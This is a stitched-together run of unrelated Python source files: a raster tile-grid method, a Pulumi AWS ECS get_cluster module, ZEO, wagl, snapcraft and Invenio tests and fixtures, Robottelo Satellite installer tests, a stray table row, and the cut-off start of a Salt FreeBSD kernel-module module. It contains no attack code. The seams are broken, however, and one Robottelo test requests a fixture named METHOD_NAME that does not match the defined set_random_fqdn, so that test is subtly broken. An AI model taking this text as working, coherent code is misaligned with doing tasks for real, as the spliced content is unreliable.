        """ Compute rows and columns overlapping with a given ``BoundingBox``
        """
        def clamped_range(v1: float, v2: float, N: int) -> range:
            _in = clamp(math.floor(v1), 0, N)
            _out = clamp(math.ceil(v2), 0, N)
            return range(_in, _out)

        sy, sx = self._tile_shape
        A = Affine.scale(1.0/sx, 1.0/sy)*(~self._gbox.transform)
        # A maps from X,Y in meters to chunk index
        bbox = bbox.transform(A)
        NY, NX = self.shape
        xx = clamped_range(bbox.left, bbox.right, NX)
        yy = clamped_range(bbox.bottom, bbox.top, NY)
        return (yy, xx)

    def tiles(self, polygon: Geometry) -> Iterable[Tuple[int, int]]:
        """ Return tile indexes overlapping with a given geometry.
        """
        if self._gbox.crs is None:
            poly = polygon
        else:
            poly = polygon.to_crs(self._gbox.crs)

        yy, xx = self.range_from_bbox(poly.boundingbox)
        for idx in itertools.product(yy, xx):
            gbox = self[idx]
            if gbox.extent.intersects(poly):
                yield idx
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetClusterResult',
'AwaitableGetClusterResult',
'get_cluster',
'get_cluster_output',
]
@pulumi.output_type
class GetClusterResult:
    """
    A collection of values returned by getCluster.
    """
    def __init__(__self__, arn=None, cluster_name=None, id=None, pending_tasks_count=None, registered_container_instances_count=None, running_tasks_count=None, service_connect_defaults=None, settings=None, status=None, tags=None):
        # Each raw invoke-result field is type-checked, then stored via pulumi.set
        # so it can be read back through the @pulumi.getter properties below.
        if arn and not isinstance(arn, str):
            raise TypeError("Expected argument 'arn' to be a str")
        pulumi.set(__self__, "arn", arn)
        if cluster_name and not isinstance(cluster_name, str):
            raise TypeError("Expected argument 'cluster_name' to be a str")
        pulumi.set(__self__, "cluster_name", cluster_name)
        if id and not isinstance(id, str):
            raise TypeError("Expected argument 'id' to be a str")
        pulumi.set(__self__, "id", id)
        if pending_tasks_count and not isinstance(pending_tasks_count, int):
            raise TypeError("Expected argument 'pending_tasks_count' to be a int")
        pulumi.set(__self__, "pending_tasks_count", pending_tasks_count)
        if registered_container_instances_count and not isinstance(registered_container_instances_count, int):
            raise TypeError("Expected argument 'registered_container_instances_count' to be a int")
        pulumi.set(__self__, "registered_container_instances_count", registered_container_instances_count)
        if running_tasks_count and not isinstance(running_tasks_count, int):
            raise TypeError("Expected argument 'running_tasks_count' to be a int")
        pulumi.set(__self__, "running_tasks_count", running_tasks_count)
        if service_connect_defaults and not isinstance(service_connect_defaults, list):
            raise TypeError("Expected argument 'service_connect_defaults' to be a list")
        pulumi.set(__self__, "service_connect_defaults", service_connect_defaults)
        if settings and not isinstance(settings, list):
            raise TypeError("Expected argument 'settings' to be a list")
        pulumi.set(__self__, "settings", settings)
        if status and not isinstance(status, str):
            raise TypeError("Expected argument 'status' to be a str")
        pulumi.set(__self__, "status", status)
        if tags and not isinstance(tags, dict):
            raise TypeError("Expected argument 'tags' to be a dict")
        pulumi.set(__self__, "tags", tags)
    @property
    @pulumi.getter
    def arn(self) -> str:
        """
        ARN of the ECS Cluster
        """
        return pulumi.get(self, "arn")
    @property
    @pulumi.getter(name="clusterName")
    def cluster_name(self) -> str:
        """
        Name of the ECS Cluster
        """
        return pulumi.get(self, "cluster_name")
    @property
    @pulumi.getter
    def id(self) -> str:
        """
        The provider-assigned unique ID for this managed resource.
        """
        return pulumi.get(self, "id")
    @property
    @pulumi.getter(name="pendingTasksCount")
    def pending_tasks_count(self) -> int:
        """
        Number of pending tasks for the ECS Cluster
        """
        return pulumi.get(self, "pending_tasks_count")
    @property
    @pulumi.getter(name="registeredContainerInstancesCount")
    def registered_container_instances_count(self) -> int:
        """
        The number of registered container instances for the ECS Cluster
        """
        return pulumi.get(self, "registered_container_instances_count")
    @property
    @pulumi.getter(name="runningTasksCount")
    def running_tasks_count(self) -> int:
        """
        Number of running tasks for the ECS Cluster
        """
        return pulumi.get(self, "running_tasks_count")
    @property
    @pulumi.getter(name="serviceConnectDefaults")
    def service_connect_defaults(self) -> Sequence['outputs.GetClusterServiceConnectDefaultResult']:
        """
        The default Service Connect namespace
        """
        return pulumi.get(self, "service_connect_defaults")
    @property
    @pulumi.getter
    def settings(self) -> Sequence['outputs.GetClusterSettingResult']:
        """
        Settings associated with the ECS Cluster
        """
        return pulumi.get(self, "settings")
    @property
    @pulumi.getter
    def status(self) -> str:
        """
        Status of the ECS Cluster
        """
        return pulumi.get(self, "status")
    @property
    @pulumi.getter
    def tags(self) -> Mapping[str, str]:
        """
        Key-value map of resource tags
        """
        return pulumi.get(self, "tags")
class AwaitableGetClusterResult(GetClusterResult):
    # Makes GetClusterResult usable with ``await``: __await__ is a generator
    # that yields nothing (the ``if False`` is never taken) and immediately
    # returns a plain GetClusterResult copy of the resolved fields.
    # pylint: disable=using-constant-test
    def __await__(self):
        if False:
            yield self
        return GetClusterResult(
            arn=self.arn,
            cluster_name=self.cluster_name,
            id=self.id,
            pending_tasks_count=self.pending_tasks_count,
            registered_container_instances_count=self.registered_container_instances_count,
            running_tasks_count=self.running_tasks_count,
            service_connect_defaults=self.service_connect_defaults,
            settings=self.settings,
            status=self.status,
            tags=self.tags)
def get_cluster(cluster_name: Optional[str] = None,
                tags: Optional[Mapping[str, str]] = None,
                opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetClusterResult:
    """
    The ECS Cluster data source allows access to details of a specific
    cluster within an AWS ECS service.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_aws as aws
    ecs_mongo = aws.ecs.get_cluster(cluster_name="ecs-mongo-production")
    ```
    :param str cluster_name: Name of the ECS Cluster
    :param Mapping[str, str] tags: Key-value map of resource tags
    """
    __args__ = dict()
    __args__['clusterName'] = cluster_name
    __args__['tags'] = tags
    opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
    # Synchronously invoke the provider data-source read and wrap the typed result.
    __ret__ = pulumi.runtime.invoke('aws:ecs/getCluster:getCluster', __args__, opts=opts, typ=GetClusterResult).value
    return AwaitableGetClusterResult(
        arn=pulumi.get(__ret__, 'arn'),
        cluster_name=pulumi.get(__ret__, 'cluster_name'),
        id=pulumi.get(__ret__, 'id'),
        pending_tasks_count=pulumi.get(__ret__, 'pending_tasks_count'),
        registered_container_instances_count=pulumi.get(__ret__, 'registered_container_instances_count'),
        running_tasks_count=pulumi.get(__ret__, 'running_tasks_count'),
        service_connect_defaults=pulumi.get(__ret__, 'service_connect_defaults'),
        settings=pulumi.get(__ret__, 'settings'),
        status=pulumi.get(__ret__, 'status'),
        tags=pulumi.get(__ret__, 'tags'))
@_utilities.lift_output_func(get_cluster)
def get_cluster_output(cluster_name: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Optional[Mapping[str, str]]]] = None,
                       opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetClusterResult]:
    """
    The ECS Cluster data source allows access to details of a specific
    cluster within an AWS ECS service.
    ## Example Usage
    ```python
    import pulumi
    import pulumi_aws as aws
    ecs_mongo = aws.ecs.get_cluster(cluster_name="ecs-mongo-production")
    ```
    :param str cluster_name: Name of the ECS Cluster
    :param Mapping[str, str] tags: Key-value map of resource tags
    """
    # Body supplied by the lift_output_func decorator wrapping get_cluster.
    ...
import unittest
from unittest import mock
from ZEO.runzeo import ZEOServer
class TestStorageServer:
    """Test double for a ZEO storage server that records method calls."""

    def __init__(self, fail_create_server):
        # Ordered record of method names invoked on this instance.
        self.called = []
        if fail_create_server:
            raise RuntimeError()

    def close(self):
        """Record the close call instead of closing anything."""
        self.called.append("close")
class TestZEOServer(ZEOServer):
    """ZEOServer subclass that stubs every lifecycle hook and records the
    order in which ZEOServer.main invokes them.

    ``fail_create_server`` / ``fail_loop_forever`` make the corresponding
    hook raise, so tests can exercise error paths in main().
    """

    def __init__(self, fail_create_server=False, fail_loop_forever=False):
        ZEOServer.__init__(self, None)
        self.called = []
        self.fail_create_server = fail_create_server
        self.fail_loop_forever = fail_loop_forever

    def setup_default_logging(self):
        self.called.append("setup_default_logging")

    def check_socket(self):
        self.called.append("check_socket")

    def clear_socket(self):
        self.called.append("clear_socket")

    def make_pidfile(self):
        self.called.append("make_pidfile")

    def open_storages(self):
        self.called.append("open_storages")

    def setup_signals(self):
        self.called.append("setup_signals")

    def create_server(self):
        self.called.append("create_server")
        # May raise RuntimeError when fail_create_server is set.
        self.server = TestStorageServer(self.fail_create_server)

    def loop_forever(self):
        self.called.append("loop_forever")
        if self.fail_loop_forever:
            raise RuntimeError()

    def close_server(self):
        # Record the call but still run the real close_server logic.
        self.called.append("close_server")
        ZEOServer.close_server(self)

    def remove_pidfile(self):
        self.called.append("remove_pidfile")
class AttributeErrorTests(unittest.TestCase):
    """Regression tests for an AttributeError in ZEOServer.main."""
    def testFailCreateServer(self):
        #
        # Fix AttributeError: 'ZEOServer' object has no attribute
        # 'server' in ZEOServer.main
        #
        # Demonstrate the AttributeError
        zeo = TestZEOServer(fail_create_server=True)
        self.assertRaises(RuntimeError, zeo.main)
class CloseServerTests(unittest.TestCase):
    """Verify that ZEOServer.main always runs the close_server hook,
    on the success path and when create_server/loop_forever raise."""
    def testCallSequence(self):
        # The close_server hook is called after loop_forever
        # has returned
        zeo = TestZEOServer()
        zeo.main()
        self.assertEqual(zeo.called, [
            "setup_default_logging",
            "check_socket",
            "clear_socket",
            "make_pidfile",
            "open_storages",
            "setup_signals",
            "create_server",
            "loop_forever",
            "close_server",  # New
            "clear_socket",
            "remove_pidfile",
        ])
        # The default implementation closes the storage server
        self.assertEqual(hasattr(zeo, "server"), True)
        self.assertEqual(zeo.server.called, ["close"])
    def testFailLoopForever(self):
        # The close_server hook is called if loop_forever exits
        # with an exception
        zeo = TestZEOServer(fail_loop_forever=True)
        self.assertRaises(RuntimeError, zeo.main)
        self.assertEqual(zeo.called, [
            "setup_default_logging",
            "check_socket",
            "clear_socket",
            "make_pidfile",
            "open_storages",
            "setup_signals",
            "create_server",
            "loop_forever",
            "close_server",
            "clear_socket",
            "remove_pidfile",
        ])
        # The storage server has been closed
        self.assertEqual(hasattr(zeo, "server"), True)
        self.assertEqual(zeo.server.called, ["close"])
    def testFailCreateServer(self):
        # The close_server hook is called if create_server exits
        # with an exception
        zeo = TestZEOServer(fail_create_server=True)
        self.assertRaises(RuntimeError, zeo.main)
        # Note: loop_forever is absent — main skips it when create_server fails.
        self.assertEqual(zeo.called, [
            "setup_default_logging",
            "check_socket",
            "clear_socket",
            "make_pidfile",
            "open_storages",
            "setup_signals",
            "create_server",
            "close_server",
            "clear_socket",
            "remove_pidfile",
        ])
        # The server attribute is present but None
        self.assertEqual(hasattr(zeo, "server"), True)
        self.assertEqual(zeo.server, None)
@mock.patch('os.unlink')
class TestZEOServerSocket(unittest.TestCase):
    """Tests for ZEOServer.clear_socket: unix-socket (str) addresses are
    unlinked, while bytes and (host, port) tuple addresses are left alone."""

    def _unlinked(self, unlink, options):
        server = ZEOServer(options)
        server.clear_socket()
        unlink.assert_called_once()

    def _not_unlinked(self, unlink, options):
        server = ZEOServer(options)
        server.clear_socket()
        unlink.assert_not_called()

    def test_clear_with_native_str(self, unlink):
        class Options:
            address = "a str that does not exist"
        self._unlinked(unlink, Options)

    def test_clear_with_unicode_str(self, unlink):
        # NOTE(review): identical to test_clear_with_native_str on Python 3;
        # kept for historical (Python 2 native-vs-unicode str) coverage.
        class Options:
            address = "a str that does not exist"
        self._unlinked(unlink, Options)

    def test_clear_with_bytes(self, unlink):
        class Options:
            address = b'a byte str that does not exist'
        # bytes are not a string type under Py3
        assertion = self._not_unlinked
        assertion(unlink, Options)

    def test_clear_with_tuple(self, unlink):
        class Options:
            address = ('abc', 1)
        self._not_unlinked(unlink, Options)
#!/usr/bin/env python
"""
Unit test for the bilinear recursive bisection function found in
wagl.interpolation.bilinear
"""
from __future__ import absolute_import
import unittest
import numpy
import math
from wagl.interpolation import bilinear, subdivide, indices, interpolate_block
class BLRBTest(unittest.TestCase):
    """Tests for the bilinear recursive-bisection helpers:
    indices, subdivide, bilinear and interpolate_block."""

    def setUp(self):
        self.origin = (0, 0)
        self.shape = (16, 32)  # (nrows, ncols)

    def test_indices(self):
        t = indices(self.origin, self.shape)
        self.assertEqual(t, (0, 15, 0, 31))
        t = indices((2, 3), (3, 4))
        self.assertEqual(t, (2, 4, 3, 6))

    def test_subdivide(self):
        d = subdivide(self.origin, self.shape)
        self.assertEqual(sorted(d.keys()), ["LL", "LR", "UL", "UR"])
        self.assertEqual(d["UL"], [(0, 0), (0, 16), (8, 0), (8, 16)])
        self.assertEqual(d["UR"], [(0, 16), (0, 31), (8, 16), (8, 31)])
        self.assertEqual(d["LL"], [(8, 0), (8, 16), (15, 0), (15, 16)])
        self.assertEqual(d["LR"], [(8, 16), (8, 31), (15, 16), (15, 31)])

    def test_bilinear_0(self):
        # Constant corner values must interpolate to a constant surface.
        x = math.pi
        a = bilinear((5, 5), x, x, x, x)
        self.assertEqual(a[0, 0], x)
        self.assertEqual(a[0, 4], x)
        self.assertEqual(a[4, 4], x)
        self.assertEqual(a[2, 2], x)
        self.assertEqual(a[4, 0], x)

    def test_bilinear_1(self):
        a = bilinear((5, 5), 0.0, 1.0, 1.0, 0.0)
        self.assertEqual(a[0, 0], 0.0)
        self.assertEqual(a[0, 4], 1.0)
        self.assertEqual(a[4, 0], 0.0)
        self.assertEqual(a[2, 2], 0.5)
        self.assertEqual(a[4, 4], 1.0)

    def test_bilinear_2(self):
        a = bilinear((5, 5), 0.0, 1.0, 2.0, 1.0)
        self.assertEqual(a[0, 0], 0.0)
        self.assertEqual(a[0, 4], 1.0)
        self.assertEqual(a[4, 0], 1.0)
        self.assertEqual(a[2, 2], 1.0)
        self.assertEqual(a[4, 4], 2.0)

    def test_interpolate_block_0(self):
        def f(i, j):
            return float(i * j)
        b = interpolate_block((0, 0), (5, 5), f, grid=None)
        self.assertEqual(b[0, 0], 0.0)
        self.assertEqual(b[0, 4], 0.0)
        self.assertEqual(b[4, 0], 0.0)
        self.assertEqual(b[2, 2], 4.0)
        self.assertEqual(b[4, 4], 16.0)

    def test_interpolate_block_1(self):
        def f(i, j):
            return float(i * j)
        b = interpolate_block((0, 0), (5, 11), f, grid=None)
        self.assertEqual(b[0, 0], 0.0)
        self.assertEqual(b[0, -1], 0.0)
        self.assertEqual(b[-1, 0], 0.0)
        self.assertEqual(b[-1, -1], 40.0)
        self.assertEqual(b[-2, -1], 30.0)
        self.assertEqual(b[-1, -2], 36.0)

    def test_interpolate_block_2(self):
        # f is linear, so interpolation must reproduce it exactly.
        def f(i, j):
            return float(i + j)
        origin = (0, 0)
        shape = (3, 5)  # nrows, ncols
        fUL = f(0, 0)  # 0.0
        fUR = f(0, 4)  # 4.0
        fLL = f(2, 0)  # 2.0
        fLR = f(2, 4)  # 6.0
        a = bilinear(shape, fUL, fUR, fLR, fLL)
        self.assertEqual(a[0, 0], fUL)
        self.assertEqual(a[0, -1], fUR)
        self.assertEqual(a[-1, -1], fLR)
        self.assertEqual(a[-1, 0], fLL)
        b = interpolate_block(origin, shape, f, grid=None)
        self.assertTrue(numpy.max(b - a) < 0.000001)

    def test_interpolate_block_3(self):
        def f(i, j):
            return float(i) ** 2 * math.sqrt(float(j))
        origin = (0, 0)
        shape = (3, 5)  # nrows, ncols
        fUL = f(0, 0)
        fUR = f(0, 4)
        fLL = f(2, 0)
        fLR = f(2, 4)
        a = bilinear(shape, fUL, fUR, fLR, fLL)
        self.assertEqual(a[0, 0], fUL)
        self.assertEqual(a[0, -1], fUR)
        self.assertEqual(a[-1, -1], fLR)
        self.assertEqual(a[-1, 0], fLL)
        b = interpolate_block(origin, shape, f, grid=None)
        self.assertTrue(numpy.max(b - a) < 0.000001)
def the_suite():
    """Returns a test suite of all the tests in this module."""
    loader = unittest.defaultTestLoader
    suites = [loader.loadTestsFromTestCase(cls) for cls in [BLRBTest]]
    return unittest.TestSuite(suites)
#
# Run unit tests if in __main__
#
if __name__ == "__main__":
    unittest.TextTestRunner(verbosity=2).run(the_suite())
# -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2018 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from testtools.matchers import Equals
from snapcraft_legacy import project
from snapcraft_legacy.internal.project_loader import inspection
from tests.legacy import unit
class ProvidesTest(unit.TestCase):
    """Tests for inspection.provides(): mapping a staged/primed file back
    to the part(s) that provide it."""

    def setUp(self):
        super().setUp()
        self.part1 = self.load_part("part1")
        self.part2 = self.load_part("part2")
        self.parts = [self.part1, self.part2]
        self.project = project.Project()
        self.part1.makedirs()
        self.part2.makedirs()

    def test_provides_stage(self):
        file1_path = os.path.join(self.project.stage_dir, "file1")
        file2_path = os.path.join(self.project.stage_dir, "file2")
        self.part1.mark_stage_done({"file1"}, set())
        self.part2.mark_stage_done({"file2"}, set())
        for file_path in (file1_path, file2_path):
            open(file_path, "w").close()
        self.assertThat(
            inspection.provides(file1_path, self.project, self.parts),
            Equals({self.part1}),
        )
        self.assertThat(
            inspection.provides(file2_path, self.project, self.parts),
            Equals({self.part2}),
        )

    def test_provides_prime(self):
        file1_path = os.path.join(self.project.prime_dir, "file1")
        file2_path = os.path.join(self.project.prime_dir, "file2")
        self.part1.mark_prime_done({"file1"}, set(), set(), set())
        self.part2.mark_prime_done({"file2"}, set(), set(), set())
        open(file1_path, "w").close()
        open(file2_path, "w").close()
        self.assertThat(
            inspection.provides(file1_path, self.project, self.parts),
            Equals({self.part1}),
        )
        self.assertThat(
            inspection.provides(file2_path, self.project, self.parts),
            Equals({self.part2}),
        )

    def test_provides_dir(self):
        # A directory staged by both parts is attributed to both.
        dir_path = os.path.join(self.project.stage_dir, "dir")
        file1_path = os.path.join(dir_path, "file1")
        file2_path = os.path.join(dir_path, "file2")
        self.part1.mark_stage_done({os.path.join("dir", "file1")}, {"dir"})
        self.part2.mark_stage_done({os.path.join("dir", "file2")}, {"dir"})
        for file_path in (file1_path, file2_path):
            os.makedirs(os.path.dirname(file_path), exist_ok=True)
            open(file_path, "w").close()
        self.assertThat(
            inspection.provides(dir_path, self.project, self.parts),
            Equals({self.part1, self.part2}),
        )

    def test_provides_file_outside_stage_or_prime(self):
        file_path = os.path.join(self.part1.part_source_dir, "file")
        open(file_path, "w").close()
        raised = self.assertRaises(
            inspection.errors.ProvidesInvalidFilePathError,
            inspection.provides,
            file_path,
            self.project,
            self.parts,
        )
        self.assertThat(raised.path, Equals(file_path))

    def test_provides_untracked_file(self):
        file_path = os.path.join(self.project.stage_dir, "file")
        open(file_path, "w").close()
        raised = self.assertRaises(
            inspection.errors.UntrackedFileError,
            inspection.provides,
            file_path,
            self.project,
            self.parts,
        )
        self.assertThat(raised.path, Equals(file_path))

    def test_provides_no_such_file(self):
        file_path = os.path.join(self.project.stage_dir, "foo")
        raised = self.assertRaises(
            inspection.errors.NoSuchFileError,
            inspection.provides,
            file_path,
            self.project,
            self.parts,
        )
        self.assertThat(raised.path, Equals(file_path))
# -*- coding: utf-8 -*-
#
# Copyright (C) 2023 CERN.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""CodeMeta specific test configs."""
import pytest
from invenio_access.permissions import system_identity
from invenio_vocabularies.proxies import current_service as vocabulary_service
from invenio_vocabularies.records.api import Vocabulary
from invenio_rdm_records.cli import (
create_records_custom_field,
custom_field_exists_in_records,
)
from invenio_rdm_records.contrib.codemeta.custom_fields import (
CODEMETA_CUSTOM_FIELDS,
CODEMETA_FACETS,
CODEMETA_NAMESPACE,
)
from invenio_rdm_records.proxies import current_rdm_records_service
from invenio_rdm_records.records.api import RDMDraft, RDMRecord
@pytest.fixture(scope="module")
def custom_field_exists(cli_runner):
    """Factory fixture, tests whether a given custom field exists."""
    def _custom_field_exists(cf_name):
        # Invoke the CLI check, passing the field name via the -f option.
        return cli_runner(custom_field_exists_in_records, "-f", cf_name)
    return _custom_field_exists
@pytest.fixture(scope="function")
def initialise_custom_fields(app, location, db, search_clear, cli_runner):
    """Fixture initialises custom fields."""
    # Runs the CLI command that creates record custom fields.
    return cli_runner(create_records_custom_field)
@pytest.fixture(scope="function")
def initialise_codemeta_custom_fields(
    cli_runner, app_codemeta_config, search_clear, db, location, running_app
):
    """Initialised codemeta custom fields."""
    app = running_app.app
    original_config = app.config.copy()
    # Inject the codemeta-specific config for the duration of the test.
    app.config = {**app.config, **app_codemeta_config}
    yield cli_runner(create_records_custom_field)
    # Restore the untouched app config on teardown.
    app.config = original_config


@pytest.fixture(scope="session")
def app_codemeta_config(
    codemeta_cf_facetted_term,
):
    """Yields the app config fixture with codemeta CF specific configs injected."""
    code_meta_configs = {
        "RDM_CUSTOM_FIELDS": CODEMETA_CUSTOM_FIELDS,
        "RDM_NAMESPACES": CODEMETA_NAMESPACE,
        "RDM_FACETS": CODEMETA_FACETS,
        "RDM_SEARCH": {
            "facets": [codemeta_cf_facetted_term],
        },
    }
    return code_meta_configs
@pytest.fixture(scope="module")
def service():
    """Rdm records service instance."""
    # Proxy to the currently configured RDM records service.
    return current_rdm_records_service
@pytest.fixture(scope="function")
def codemeta_development_status(running_app):
    """Creates and retrieves a vocabulary type."""
    # Registers the 'code:developmentStatus' vocabulary type under the pid prefix 'ds'.
    v = vocabulary_service.create_type(system_identity, "code:developmentStatus", "ds")
    return v
@pytest.fixture(scope="session")
def codemeta_development_status_vocabulary_data():
    """Fixture returns 'codemeta:developmentStatus' vocabulary data."""
    # A single vocabulary entry ("concept") of type 'code:developmentStatus'.
    return {
        "id": "concept",
        "title": {
            "en": "Concept",
        },
        "description": {
            "en": "Minimal or no implementation has been done yet, or the repository is only intended to be a limited example, demo, or proof-of-concept."
        },
        "type": "code:developmentStatus",
    }
@pytest.fixture(scope="function")
def codemeta_development_status_vocabulary(
    codemeta_development_status,
    codemeta_development_status_vocabulary_data,
):
    """Creates and retrieves controlled vocabulary 'development status'."""
    record = vocabulary_service.create(
        identity=system_identity,
        data=codemeta_development_status_vocabulary_data,
    )
    Vocabulary.index.refresh()  # Refresh the index
    return record
@pytest.fixture(scope="session")
def codemeta_cf_name():
    """Example of a codemeta custom field name."""
    return "code:developmentStatus"
@pytest.fixture(scope="session")
def codemeta_cf_value():
    """Example of a codemeta custom field value (from controlled vocabulary)."""
    return "concept"
@pytest.fixture(scope="session")
def codemeta_cf_facetted_term():
    """Example of a codemeta custom field term that is used as a facet term."""
    return "developmentStatus"
@pytest.fixture(scope="function")
def minimal_codemeta_record(minimal_record, codemeta_cf_name, codemeta_cf_value):
    """Represents a record containing codemeta fields (custom fields)."""
    # Extends the minimal record with a single codemeta custom field entry.
    return {
        **minimal_record,
        "custom_fields": {codemeta_cf_name: {"id": codemeta_cf_value}},
    }
@pytest.fixture(scope="function")
def codemeta_record(
    codemeta_development_status_vocabulary,
    db,
    minimal_codemeta_record,
    service,
    search_clear,
    superuser_identity,
):
    """Creates a record with codemeta custom fields added.

    The record is torn down with the db fixture, when the session is destroyed.
    Record's indexed document is deleted by the fixture "search_clear".
    """
    draft = service.create(superuser_identity, minimal_codemeta_record)
    record = service.publish(id_=draft.id, identity=superuser_identity)
    RDMRecord.index.refresh()
    return record
    # Search teardown is handled by the 'search_clear' fixture
    # DB teardown is handled by the 'db' fixture
"""Smoke tests to check installation health
:Requirement: Installer
:CaseAutomation: Automated
:CaseLevel: Acceptance
:CaseComponent: Installer
:Team: Platform
:TestType: Functional
:CaseImportance: Critical
:Upstream: No
"""
import pytest
from fauxfactory import gen_domain
from fauxfactory import gen_string
from robottelo.config import settings
from robottelo.utils.installer import InstallerCommand
pytestmark = pytest.mark.destructive
@pytest.fixture
def set_random_fqdn(target_sat):
    """Temporarily assign the satellite a random short hostname and search domain.

    Yields ``(shortname, new_domain)``; the original hostname is restored on teardown.
    """
    shortname = gen_string('alpha')
    new_domain = gen_domain()
    # Add the generated domain to the resolver search path and rename the host.
    target_sat.execute(
        f'echo "search {new_domain}" >> /etc/resolv.conf; hostnamectl set-hostname {shortname}'
    )
    yield shortname, new_domain
    target_sat.execute(f'hostnamectl set-hostname {target_sat.hostname}')
def test_installer_sat_pub_directory_accessibility(target_sat):
    """Verify the public directory accessibility from satellite url after disabling it from
    the custom-hiera

    :id: 2ef78840-098c-4be2-a9e5-db60f16bb803

    :steps:
        1. Check the public directory accessibility from http and https satellite url
        2. Add the foreman_proxy_content::pub_dir::pub_dir_options:"+FollowSymLinks -Indexes"
           in custom-hiera.yaml file.
        3. Run the satellite-installer.
        4. Check the public directory accessibility from http and https satellite url

    :expectedresults: Public directory accessibility from http and https satellite url.
        1. It should be accessible if accessibility is enabled(by default it is enabled).
        2. It should not be accessible if accessibility is disabled in custom_hiera.yaml file.

    :CaseImportance: High

    :CaseLevel: System

    :BZ: 1960801

    :customerscenario: true
    """
    http_ok_statuses = ('HTTP/1.1 200 OK', 'HTTP/2 200 ')
    custom_hiera_location = '/etc/foreman-installer/custom-hiera.yaml'
    custom_hiera_settings = (
        'foreman_proxy_content::pub_dir::pub_dir_options: "+FollowSymLinks -Indexes"'
    )
    http_curl_command = f'curl -i {target_sat.url.replace("https", "http")}/pub/ -k'
    https_curl_command = f'curl -i {target_sat.url}/pub/ -k'
    for command in [http_curl_command, https_curl_command]:
        accessibility_check = target_sat.execute(command)
        # BUG FIX: the original `assert 'HTTP/1.1 200 OK' or '...' in ...` was
        # always true because the non-empty string literal short-circuits `or`;
        # actually verify one of the OK status lines is present.
        assert any(
            status in accessibility_check.stdout.split('\r\n') for status in http_ok_statuses
        )
    # Back up the current custom-hiera.yaml locally so it can be restored later.
    target_sat.get(
        local_path='custom-hiera-satellite.yaml',
        remote_path=f'{custom_hiera_location}',
    )
    _ = target_sat.execute(f'echo {custom_hiera_settings} >> {custom_hiera_location}')
    command_output = target_sat.execute('satellite-installer', timeout='20m')
    assert 'Success!' in command_output.stdout
    for command in [http_curl_command, https_curl_command]:
        accessibility_check = target_sat.execute(command)
        # BUG FIX: same always-true assert as above; the directory must now be
        # inaccessible, so no OK status line may be present.
        assert not any(
            status in accessibility_check.stdout.split('\r\n') for status in http_ok_statuses
        )
    # Restore the original custom-hiera.yaml and re-run the installer.
    target_sat.put(
        local_path='custom-hiera-satellite.yaml',
        remote_path=f'{custom_hiera_location}',
    )
    command_output = target_sat.execute('satellite-installer', timeout='20m')
    assert 'Success!' in command_output.stdout
def test_installer_inventory_plugin_update(target_sat):
    """DB consistency should not break after enabling the inventory plugin flags

    :id: a2b66d38-e819-428f-9529-23bed398c916

    :steps:
        1. Enable the cloud inventory plugin flag

    :expectedresults: inventory flag should be updated successfully without any db consistency
        error.

    :CaseImportance: High

    :CaseLevel: System

    :BZ: 1863597

    :customerscenario: true
    """
    target_sat.create_custom_repos(rhel7=settings.repos.rhel7_os)
    # Enable the rh-cloud plugin together with the remote-execution key option.
    installer_cmd = target_sat.install(
        InstallerCommand(
            'enable-foreman-plugin-rh-cloud',
            foreman_proxy_plugin_remote_execution_script_install_key=['true'],
        )
    )
    assert 'Success!' in installer_cmd.stdout
    # Confirm via installer help output that the puppet-module flag is now true.
    verify_rhcloud_flag = target_sat.install(
        InstallerCommand(help='|grep "\'foreman_plugin_rh_cloud\' puppet module (default: true)"')
    )
    assert 'true' in verify_rhcloud_flag.stdout
    # Confirm the proxy-plugin option shows as currently enabled.
    verify_proxy_plugin_flag = target_sat.install(
        InstallerCommand(
            **{'full-help': '| grep -A1 foreman-proxy-plugin-remote-execution-script-install-key'}
        )
    )
    assert '(current: true)' in verify_proxy_plugin_flag.stdout
def test_positive_mismatched_satellite_fqdn(target_sat, METHOD_NAME):
    """The satellite-installer should display the mismatched FQDN

    :id: 264910ca-23c8-4192-a993-24bc04994a4c

    :steps:
        1. Set incorrect satellite hostname.
        2. assert that output of 'facter fqdn' and 'hostname --fqdn' is different.
        3. Run satellite-installer.
        4. Assert that satellite-installer command displays mismatched FQDN.

    :expectedresults: The satellite-installer should display the mismatched FQDN.
    """
    shortname, new_domain = METHOD_NAME
    facter_fqdn = target_sat.execute('facter fqdn').stdout.strip()
    hostname_fqdn = target_sat.execute('hostname --fqdn').stdout.strip()
    # The fixture set only the short hostname, so facter (which appends the
    # resolv.conf search domain) and hostname must disagree.
    assert facter_fqdn == f'{shortname}.{new_domain}'
    assert hostname_fqdn == shortname
    assert facter_fqdn != hostname_fqdn
    warning_message = (
        f"Output of 'facter fqdn' "
        f"({facter_fqdn}) is different from 'hostname -f' "
        f"({hostname_fqdn})"
    )
    installer_stderr = target_sat.execute('satellite-installer').stderr
    assert warning_message in str(installer_stderr)
298,436 | available | """
Module to manage FreeBSD kernel modules
"""
import os
import re

import salt.utils.files
import salt.utils.stringutils
# Define the module's virtual name
__virtualname__ = "kmod"

# loader.conf line template used to make a module load at boot.
_LOAD_MODULE = '{0}_load="YES"'
# Path to the FreeBSD boot loader configuration file.
_LOADER_CONF = "/boot/loader.conf"
# Regex matching the persistence line for one specific module.
_MODULE_RE = '^{0}_load="YES"'
# Regex capturing the module name from any persistence line.
_MODULES_RE = r'^(\w+)_load="YES"'
def __virtual__():
    """
    Only runs on FreeBSD systems
    """
    if __grains__["kernel"] != "FreeBSD":
        return (
            False,
